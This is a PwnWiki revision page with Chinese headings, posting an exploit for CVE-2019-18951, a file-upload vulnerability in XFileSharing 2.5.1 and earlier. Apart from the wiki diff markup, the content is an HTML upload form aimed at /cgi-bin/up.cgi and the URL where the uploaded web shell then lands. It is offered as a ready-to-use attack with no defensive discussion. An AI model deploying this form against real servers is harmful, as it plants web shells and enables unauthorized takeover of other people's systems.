Difference between revisions of "CVE-2019-18951 Xfilesharing 2.5.1 本地文件上傳shell漏洞"

From PwnWiki
(Created page with "<languages /> <translate> ==漏洞影響== </translate> <pre> Version: <=2.5.1 </pre> ==EXP== <pre> <form action="http://<target>/cgi-bin/up.cgi" method="post" enctype="multi...")
 
(Marked this version for translation)
 
Line 1: Line 1:
 
<languages />
 
<languages />
 
<translate>
 
<translate>
==漏洞影響==
+
==漏洞影響== <!--T:1-->
 
</translate>
 
</translate>
 
<pre>
 
<pre>

Latest revision as of 08:48, 17 June 2021

Other languages:

漏洞影響

Version: <=2.5.1

EXP

<form action="http://<target>/cgi-bin/up.cgi" method="post" enctype="multipart/form-data">
   <input type="text" name="sid" value="joe">
   <input type="file" name="file">
   <input type="submit" value="Upload" name="submit">
</form>

Shell : http://<target>/cgi-bin/temp/joe/she